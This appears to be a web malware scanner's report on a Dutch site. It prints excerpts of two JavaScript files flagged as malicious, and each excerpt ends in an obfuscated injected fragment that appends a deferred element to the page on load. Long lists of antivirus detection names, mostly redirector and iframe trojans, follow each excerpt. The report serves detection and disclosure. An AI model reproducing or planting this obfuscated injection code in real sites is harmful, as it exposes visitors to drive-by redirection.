... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- MicroWorld-eScan
- Trojan.Iframe.AZF
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/././././1508.html?*session*id*key*=*session*id*val* | 200 OK Content-Length: 5729 Content-Type: text/html | clean |
http://zwiggelaar.nl/./././././include/url.js | 200 OK Content-Length: 17388 Content-Type: application/javascript | malicious |
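Malicious code - confirmed by antivirus engines (see below). The excerpt begins with the file's ordinary-looking session helper functions; the obfuscated block after the skipped bytes is the part consistent with the redirector detections.
var CM_SESSION_KEY_KEY = "cmSessionKeyKey";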
/**
 * Global shorthand for URL.getSessionPair.
 *
 * `URL` is resolved at call time; the object that supplies getSessionPair
 * is not part of this excerpt.
 *
 * @param {*} loc - Forwarded unchanged to URL.getSessionPair.
 * @returns {*} Whatever URL.getSessionPair(loc) returns.
 */
function getSessionPair(loc) {
  var sessionPair = URL.getSessionPair(loc);
  return sessionPair;
}
/**
 * Global shorthand for URL.getSessionHref.
 *
 * `URL` is resolved at call time; the object that supplies getSessionHref
 * is not part of this excerpt.
 *
 * @returns {*} Whatever URL.getSessionHref() returns.
 */
function getSessionHref() {
  var sessionHref = URL.getSessionHref();
  return sessionHref;
}
/**
 * Global shorthand for URL.processLinkz.
 *
 * The delegate's return value is not passed back, so this function always
 * returns undefined. What the delegate does with `doc` is not visible in
 * this excerpt.
 *
 * @param {*} doc - Forwarded unchanged to URL.processLinkz.
 * @returns {undefined}
 */
function processLinkz(doc) {
  var target = doc;
  URL.processLinkz(target);
}
/**
 * Global shorthand for URL.getSessionString.
 *
 * `URL` is resolved at call time; the object that supplies getSessionString
 * is not part of this excerpt.
 *
 * @returns {*} Whatever URL.getSessionString() returns.
 */
function getSessionString() {
  var sessionString = URL.getSessionString();
  return sessionString;
}
/**
 * Global shorthand for URL.jdecode.
 *
 * The decoding itself happens in URL.jdecode, which is not part of this
 * excerpt.
 *
 * @param {*} s - Forwarded unchanged to URL.jdecode.
 * @returns {*} Whatever URL.jdecode(s) returns.
 */
function jdecode(s) {
  var decoded = URL.jdecode(s);
  return decoded;
}
function jencode(s) {
return URL.jencode(
... 3467 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- McAfee-GW-Edition
- JS/Redirector.ad
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- Trojan.JS.Redirector.kv
- MicroWorld-eScan
- Trojan.Iframe.AZF
- Fortinet
- JS/Crypt.BBES!tr
- TotalDefense
- JS/Redirector.BH
- McAfee
- JS/Redirector.ad
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|
http://zwiggelaar.nl/./././././include/sitetree.js | 200 OK Content-Length: 8851 Content-Type: application/javascript | malicious |
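Malicious code - confirmed by antivirus engines (see below). The excerpt begins with the file's ordinary-looking sitetree data; the obfuscated block after the skipped bytes is the part consistent with the redirector detections.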
/**
 * Decodes a form-style escaped string.
 *
 * Every "+" is first turned into "%20", then the legacy global unescape()
 * expands the %XX / %uXXXX sequences. unescape() maps escapes straight to
 * code units and does not perform UTF-8 decoding.
 *
 * @param {string} s - Escaped text; must provide a replace() method.
 * @returns {string} The decoded text.
 */
function jdecode(s) {
  return unescape(s.replace(/\+/g, "%20"));
}
// Index constants. Their names and values line up with the eight slots of
// each theSitetree row below (presumably column indexes; the code that reads
// them is not part of this excerpt).
var POS_NODENAME = 0;
var POS_ID = 1;
var POS_NAME = 2;
var POS_NAVIGATIONTEXT = 3;
var POS_HREF = 4;
var POS_ISNAVIGATION = 5;
var POS_CHILDS = 6;
var POS_TEMPLATENAME = 7;

// Two entries, each an 8-element row. The name and navigation-text slots are
// passed through jdecode() when this statement executes.
var theSitetree = [
  ['PAGE', '1508', jdecode('Portal'), jdecode(''), '/1508.html', 'true', [], ''],
  ['PAGE', '33801', jdecode('Webmail'), jdecode(''), '/33801.html', 'true', [], '']
];
... 3312 bytes are skipped ...;if(MY!='gI'){MY='gI'};var ID;if(ID!=''){ID='HO'};C[YO("%64%65%66%65%72")]=[1][0];var SPC;if(SPC!=''){SPC='SI'};var tD;if(tD!='HUl'){tD=''};var wx=new String();var Wv;if(Wv!='Iz'){Wv=''};X.body.appendChild(C);var xE;if(xE!='Wg'){xE=''};var Xi="";} catch(zd){alert(zd);var NG='';this.sM='';};var JE=new String();var qB;if(qB!=''){qB='bq'};}var Ak;if(Ak!='' && Ak!='Yn'){Ak=''};var To='';s[new String("on"+"lo"+"ad")]=O;var bN='';this.AB="";};var nP;if(nP!='' && nP!='Qu'){nP='vr'};Y();Antivirus reports:- Avast
- JS:Illredir-AQ [Trj]
- Ad-Aware
- Trojan.Iframe.AZF
- Ikarus
- Trojan.JS.Redirector
- Panda
- JS/Redirector.AC
- nProtect
- Trojan.Iframe.AZF
- K7AntiVirus
- Trojan ( 637f3b880 )
- TrendMicro-HouseCall
- JS_GUMBLAR.SMNY
- Comodo
- TrojWare.JS.Redirector.UA
- Emsisoft
- Trojan.Iframe.AZF (B)
- K7GW
- Exploit ( 04c559b91 )
- DrWeb
- JS.Redirector.based.3
- TrendMicro
- JS_GUMBLAR.SMNY
- Microsoft
- Trojan:JS/Redirector.DC
- Kaspersky
- HEUR:Trojan-Downloader.Script.Generic
- MicroWorld-eScan
- Trojan.Iframe.AZF
- TotalDefense
- JS/Redirector.BH
- NANO-Antivirus
- Trojan.Script.Agent.yrkab
- F-Secure
- Trojan.Iframe.AZF
- F-Prot
- JS/Redir.AZ
- AVG
- JS/Redir
- Norman
- Redir.HU
- Sophos
- Troj/JSRedir-BD
- GData
- Trojan.Iframe.AZF
- Commtouch
- JS/Redir.AZ
- Agnitum
- JS.Redirector.Gen.5
- ESET-NOD32
- JS/TrojanDownloader.Pegel.AA
- BitDefender
- Trojan.Iframe.AZF
|